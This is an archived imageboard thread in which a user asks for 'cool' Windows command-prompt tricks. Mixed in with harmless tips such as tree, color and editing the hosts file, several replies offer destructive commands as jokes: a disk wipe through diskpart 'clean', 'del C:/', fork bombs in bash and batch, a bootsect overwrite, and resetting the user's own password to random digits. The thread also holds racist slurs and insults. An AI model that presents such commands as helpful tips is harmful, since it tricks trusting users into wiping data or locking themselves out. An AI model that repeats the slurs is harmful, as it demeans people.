[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y ] [Home]
4chanarchives logo
what are some cool things a nigga can do in windows CMD prompt?
Images are sometimes not shown due to bandwidth/network limitations. Refreshing the page usually helps.

You are currently reading a thread in /g/ - Technology

Thread replies: 47
Thread images: 2
File: cmd_basic21.gif (55 KB, 468x440) Image search: [Google]
cmd_basic21.gif
55 KB, 468x440
i wanna feel like all the linux cool kids with their terminals. what are some cool shit i can do on windows CMD prompt?
>>
>>55509318
shutdown -s
>>
ipconfig /release
>>
>>55509318
del C:/
>>
>>55509318
install gentoo

...oh wait
>>
>>55509318
Not much. You should check out Powershell instead for more comparable features to Bash.
>>
color 2
tree
>>
Bash + unity
>>
>>55509318
:() { : | : & };:
>>
>>55509389
>color 2
>tree

this was pretty cool. thanks for not giving a trolling recommendation
>>
>>55509318
I’d just like to interject for a moment. What you’re refering to as Linux, is in fact, GNU/Linux, or as I’ve recently taken to calling it, GNU plus Linux. Linux is not an operating system unto itself, but rather another free component of a fully functioning GNU system made useful by the GNU corelibs, shell utilities and vital system components comprising a full OS as defined by POSIX.

Many computer users run a modified version of the GNU system every day, without realizing it. Through a peculiar turn of events, the version of GNU which is widely used today is often called “Linux”, and many of its users are not aware that it is basically the GNU system, developed by the GNU project.

There really is a Linux, and these people are using it, but it is just a part of the system they use. Linux is the kernel: the program in the system that allocates the machine’s resources to the other programs that you run. The kernel is an essential part of an operating system, but useless by itself; it can only function in the context of a complete operating system. Linux is normally used in combination with the GNU operating system: the whole system is basically GNU with Linux added, or GNU/Linux. All the so-called “Linux” distributions are really distributions of GNU/Linux.
>>
just gib it back tyrone
>>
dir /s
>>
File: 1467190855478.png (333 KB, 420x420) Image search: [Google]
1467190855478.png
333 KB, 420x420
>>55509362
Underrated post
>>
tree
query session (optionally add a server name after)
>>
>>55509374
>C:/
>>
hang -niggers
>>
>>55509318
you start power shell fucktard
>>
>>55509389
>>55509502
cd ..
cd ..
color 0a
cls
for /l %x in (1,0,2) do tree

Fill your screen with theese and be 1337 h4x0r
>>
>>55509318
There's almost nothing useful you could do with it.

You could use conosole applications like ffmpeg though
>>
net send
>>
>>55509318
wait until that win 10 update which brings bash to windows then you'll be like all the linux kids
>>
>>55509389
>Be me
>On library computer
>color 2, tree
>The Matrix is everywhere. It is all around us.
Librarian tells me to leave because she thinks I'm hacking.
>>
>>55509318
Aside from powershell?

bcdedit /bootems
>>
del /S *.xtbl
>>
bootsect /nt52 C: /force
>>
>>55511799
i thought this would fuck up the MBR, but it probably wont
>>
Isn't there a way to play a star wars movie?
>>
>>55511422
>neckbeard snickering as he fucks with computer
>What are you doing?
>erm, I w-was j-j-just doing th-th
>Please leave, we have received complaints about your body odor and wet breathing
>Girls start laughing, not even trying to hide it

Every time I greentext it turns into my own spaghetti shit I hate it
>>
Leave you fucking faggot.
>>
>>55511942
telnet towel.blinkenlights.nl

The only thing it's missing is a PC beeper soundtrack.
>>
diskpart
select disk 0
clean
>>
>>55509318
Hack google.
You wouldn't know how to, though.
Only expert hackers do.
Hint: The first step is to get a cmd from Windows 98, Microsoft blocked the hack in newer versions.
Have fun!
>>
>>55511993
thanks for that laugh, going to bed now
>>
ping 127.0.0.1
>>
>>55512544
Stated writing a dungeon RPG in batch, quite useful for displaying text after a delay
>>
press F7
>>
>>55509318
netuser [your username] [random numbers]
enjoy
>>
win 10

>press windows button
>type cmd
>press ctrl+shift+enter

opens command prompt in administrator mode

>cd drivers/etc
>notepad hosts

quick access to hosts file. use dan pollock's list and some other adblocking lists for a better experience.
>>
>>55509318
You are missing the point.
Linux kids don't use the terminal because they want to but because they *have* to. Then they try to make a virtue of a necessity by telling you how "kewl" it is.
And you fell for it.
>>
>>55512635
HOLY FUCK
>>
C:\> echo 'I am a dumbass OP' && %0|%0
>>
>>55509318
del rm -rf
>>
>>55509362
thread
>>
>>55513745
i could easily go out of my way to avoid using the command line for anything in linux,
it would be incredibly tedious, and i might as well just use windows instead.

a big reason i stopped using windows is because i dont want to use some random GUI based program for the simplest of tasks that can be done much faster with a simple command or two.
>>
systeminfo command.
>>
>>55509426
Windows cmd doesnt use bash dumbass.
Thread replies: 47
Thread images: 2

banner
banner
[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y] [Home]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
If a post contains personal/copyrighted/illegal content you can contact me at [email protected] with that post and thread number and it will be removed as soon as possible.
DMCA Content Takedown via dmca.com
All images are hosted on imgur.com, send takedown notices to them.
This is a 4chan archive - all of the content originated from them. If you need IP information for a Poster - you need to contact them. This website shows only archived content.